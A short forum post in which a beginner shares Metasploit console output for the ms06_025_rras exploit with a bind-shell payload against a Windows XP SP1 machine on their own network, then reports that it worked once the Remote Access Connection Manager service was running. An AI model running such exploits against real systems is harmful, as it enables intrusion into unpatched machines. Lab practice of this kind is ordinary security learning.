I am taking my first faltering steps with this so please be gentle !!

Can anyone tell me what is happening please ? 2 PCs on same network - target = [XP with SP1 only], Host =, No firewalls or virus software running on either.
Extracts from terminal :

msf exploit(ms06_025_rras) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE SRVSVC yes The pipe name to use (ROUTER, SRVSVC)

Payload options (windows/shell_bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
RHOST no The target address

Exploit target:
Id Name
-- ----
1 Windows XP SP1

msf exploit(ms06_025_rras) > exploit

* Started bind handler
* Binding to 20610036-fa22-11cf-9823-00a0c911e5df:1.0@ncacn_np:[\SRVSVC] ...
[-] Exploit failed: Could not bind to 20610036-fa22-11cf-9823-00a0c911e5df:1.0@ncacn_np:[\SRVSVC]
* Exploit completed, but no session was created.

msf exploit(ms06_025_rras) >

I get EXACTLY the same result if the target has NO SPs or just SP1. Also same result if I try a reverse shell payload [windows/shell_reverse_tcp]. Have run the same exploits from Linux and Windows and STILL get same result.

Could someone point me in the right direction please ? Thanks.


All sorted.
I wasnt getting a bind because not all Windows SP1 boxes have the Remote Access Connection Manager service up and running.
My target was set to 'Manual'. When the service was started the exploit worked as it was intended.